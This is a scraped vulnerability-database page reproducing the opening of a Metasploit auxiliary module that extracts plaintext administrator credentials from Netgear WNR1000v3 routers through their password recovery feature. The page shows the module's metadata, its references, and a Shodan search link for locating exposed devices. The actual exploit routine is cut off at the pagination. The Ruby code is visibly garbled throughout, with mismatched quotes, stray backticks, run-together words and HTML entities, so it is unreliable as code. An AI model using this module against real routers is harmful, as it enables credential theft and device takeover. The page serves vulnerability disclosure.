Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability-vulnerability warning-the black bar safety net

2014-07-09T00:00:00
ID MYHACK58:62201451066
Type myhack58
Reporter 佚名
Modified 2014-07-09T00:00:00

Description

# Current source: https://github.com/rapid7/metasploit-framework

the #

# Exploit Title: Netgear WNR1000v3 Password Recovery Credential Disclosure Vulnerability

# Date: 7-5-14

# Exploit Author: c1ph04

# Version: 1.0

# Tested on: Netgear WNR1000v3 Router Version: <= 1.0.2.62_60.0.87

require'msf/core"

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient`

definitialize`

the super(

The'Name" =>'Netgear WNR1000v3 Password Extractor",

'Description" => %q{

This module exploits a vulnerabilityinthe password recovery feature of certain Netgear WNR1000v3 routers.`

Affected devices will allow retrieval of the plaintext administrator credentials.`

TheVulnerable Versions: <= 1.0.2.62_60.0.8 7

},`

'References" =&gt;

[`

[ 'URL", 'http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html"],`

[ 'URL", 'http://packetstormsecurity.com/files/124759/NETGEAR-WNR1000v3-Password-Disclosure.html"],`

[ 'URL", 'http://secunia.com/community/advisories/56330"],`

[ 'URL", 'http://www.shodanhq.com/search?q=WNR1000v3"]`

],`

'Author" =&gt;

[`

'c1ph04 <c1ph04mail[at]gmail.com>" # aka - "Ms. Difrank"...idiots

],`

'License" =&gt;MSF_LICENSE`

)`

end`

[1] [2] next